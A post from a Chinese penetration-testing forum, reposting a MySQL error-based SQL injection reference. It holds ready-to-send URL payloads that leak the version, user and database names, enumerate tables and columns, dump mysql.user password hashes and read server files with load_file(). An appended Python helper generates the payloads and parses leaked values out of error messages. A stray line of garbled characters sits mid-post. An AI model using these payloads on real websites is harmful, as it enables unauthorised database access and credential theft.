中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: MySQL Error-Based Injection Reference (pdf)

Author: admin    Time: 2013-7-27 11:00
Title: MySQL Error-Based Injection Reference (pdf)
This post was last edited by Nightmare on 2013-3-17 14:20
MySQL Error-Based Injection Reference (pdf), one post a day...

MySql Error Based Injection Reference [Mysql暴错注入参考]
Author: pnig0s1992
Blog: http://pnig0s1992.blog.51cto.com/
Team: http://www.FreeBuf.com/
Tested on MySQL 5.0.91; it works on the great majority of 5.x versions.
A small number of versions return an error when name_const() is used (later builds only accept constant arguments, so the variants that pass a subquery or user() into name_const() fail with "Incorrect arguments to NAME_CONST"); on those, use the Method 2 payload given for each step instead.
Method 1 leaks the value through a "Duplicate column name" error: name_const() names the column after its first argument and the self-join repeats that column. Method 2 leaks it through a "Duplicate entry ... for key" error, raised when the GROUP BY temporary table is filled with the deterministic floor(rand(0)*2) key. Payloads are written with + for spaces, as they would be sent in a URL query string; 0x... literals are hex-encoded strings so no quotes are needed.
Query the version:
Method.1: and+exists(select*from+(select*from(select+name_const(@@version,0))a+join+(select+name_const(@@version,0))b)c)
Method.2: and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+group+by+a)b)
Query the current user:
Method.1: and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Query the current database:
Method.1: and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2: and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
Enumerate databases one by one:
and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c)
Replace n with 0, 1, 2, ... in turn (on builds where name_const() rejects the subquery, wrap the same SELECT in the Method 2 shape shown for the tables and columns below).
Number of tables in a given database:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+table_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql
Enumerate tables one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+table_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql; replace n with 0, 1, 2, ... in turn
Number of columns in a table:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
0x6D7973716C = mysql, 0x636F6C756D6E735F70726976 = columns_priv
Enumerate columns one by one:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with 0, 1, 2, ... in turn
Dump row contents one by one:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
Replace n with 0, 1, 2, ... in turn
Dump file contents:
and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a+from+information_schema.tables+group+by+a)b)
0x433A5C5C746573742E617361 = C:\\test.asa (the path used in the payload above); 0x433A5C5C626F6F742E696E69 = C:\\boot.ini. The "Duplicate entry" message only shows the first 64 bytes of the key, so use substring() to pick which bytes of the file are displayed, stepping the start position on each request. Note that the floor(rand(0)*2) digit concatenated in front counts toward those 64 bytes, so a 64-byte substring() window actually reveals 63 bytes of the file; a 63-byte window avoids losing the last byte.
( X5 F7 B/ j0 l9 k3 F' h  n9 l- e; iThx for reading.
No need to download it either.
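The following Python helper is an added example, not part of the original reference or of the author's code. It generates the Method 2 (count(*) / floor(rand(0)*2) / group by) payloads for the steps above from a database, table or column index, hex-encodes literals the way the reference does (0x6D7973716C = mysql), parses the leaked value back out of mysqld's "Duplicate entry" error text, and splits load_file() output into substring() windows that fit the 64-character limit. The 0x7e (~) delimiters placed around the leaked value and all sample error strings are this example's own assumptions (the reference's payloads use no delimiters); nothing here contacts a server.

```python
"""Helpers for MySQL error-based extraction (added example, not from the reference).

Builds the Method 2 payload shape the reference uses everywhere
(count(*) + concat(...,floor(rand(0)*2)) + group by), hex-encodes string
literals the way the reference does (0x6D7973716C = 'mysql'), and parses the
leaked value back out of mysqld's "Duplicate entry" error text. Error strings
used for testing are constructed samples in mysqld's message format; nothing
here talks to a server.
"""
import re

# ER_DUP_ENTRY text, two formats seen across versions (constructed samples):
#   MySQL 5.0:  Duplicate entry '<value>' for key 1
#   MySQL 5.5+: Duplicate entry '<value>' for key 'group_key'
_DUP_ENTRY = re.compile(r"Duplicate entry '(.*)' for key ")

MARK = "~"        # wrapped around the leaked value so the parser can find it
ERR_WIDTH = 64    # mysqld cuts the entry shown in the message to 64 characters


def hexlit(text: str) -> str:
    """'mysql' -> '0x6D7973716C': a quote-free literal, as the reference uses."""
    return "0x" + text.encode().hex().upper()


def unhexlit(lit: str) -> str:
    """Reverse of hexlit: '0x636F6C756D6E735F70726976' -> 'columns_priv'."""
    return bytes.fromhex(lit[2:]).decode()


def rand_floor_payload(expr: str) -> str:
    """Method 2 of the reference wrapped around an arbitrary scalar expression.

    The GROUP BY temporary table is keyed on concat(MARK, expr, MARK,
    floor(rand(0)*2)); rand(0) is deterministic and repeats key values, so the
    insert into that table collides and mysqld raises ER_DUP_ENTRY with the
    key, i.e. expr's value, in the message. The MARK delimiters are this
    example's addition; the reference's payloads do not use them.
    """
    m = hexlit(MARK)
    return ("and (select 1 from (select count(*),"
            f"concat({m},({expr}),{m},floor(rand(0)*2))x "
            "from information_schema.tables group by x)a)")


def schema_payload(n: int) -> str:
    """n-th database name; step n = 0, 1, 2, ... as the reference says."""
    return rand_floor_payload(
        f"select distinct schema_name from information_schema.schemata limit {n},1")


def table_payload(schema: str, n: int) -> str:
    """n-th table in `schema` (schema goes in as a 0x literal)."""
    return rand_floor_payload(
        "select distinct table_name from information_schema.tables "
        f"where table_schema={hexlit(schema)} limit {n},1")


def column_payload(schema: str, table: str, n: int) -> str:
    """n-th column of schema.table."""
    return rand_floor_payload(
        "select distinct column_name from information_schema.columns "
        f"where table_schema={hexlit(schema)} and table_name={hexlit(table)} "
        f"limit {n},1")


def file_window_payloads(path: str, length: int, width: int = ERR_WIDTH - 2):
    """load_file() output in substring() windows that survive the 64-character
    cut (two of the 64 go to the markers). Returns [(pos, payload), ...]."""
    return [(pos, rand_floor_payload(
                f"substring(load_file({hexlit(path)}),{pos},{width})"))
            for pos in range(1, length + 1, width)]


def extract_leak(error_text: str):
    """Pull the value out of an ER_DUP_ENTRY message produced by the payloads
    above. Returns (value, complete); complete is False when the closing MARK
    was cut off by the 64-character limit, meaning the value is longer than
    the window and the caller should narrow it with substring(). A value that
    itself contains MARK is cut at the first occurrence."""
    m = _DUP_ENTRY.search(error_text)
    if not m or not m.group(1).startswith(MARK):
        return None
    body = m.group(1)[len(MARK):]
    end = body.find(MARK)
    if end == -1:
        return body, False
    return body[:end], True


def reassemble(chunks) -> str:
    """Join (pos, value) pairs recovered from file_window_payloads in order."""
    return "".join(value for _, value in sorted(chunks))


if __name__ == "__main__":
    print(table_payload("mysql", 0))
    sample = "ERROR 1062 (23000): Duplicate entry '~5.0.91-community~1' for key 1"
    print(extract_leak(sample))
```

Each payload is meant to be appended to an injectable numeric parameter exactly like the reference's and+... strings; URL-encode it (or swap spaces for +) before sending. When extract_leak() reports complete=False, the value did not fit in the 64-character entry, so re-request it through file_window_payloads()-style substring() windows and stitch the pieces with reassemble().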





Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2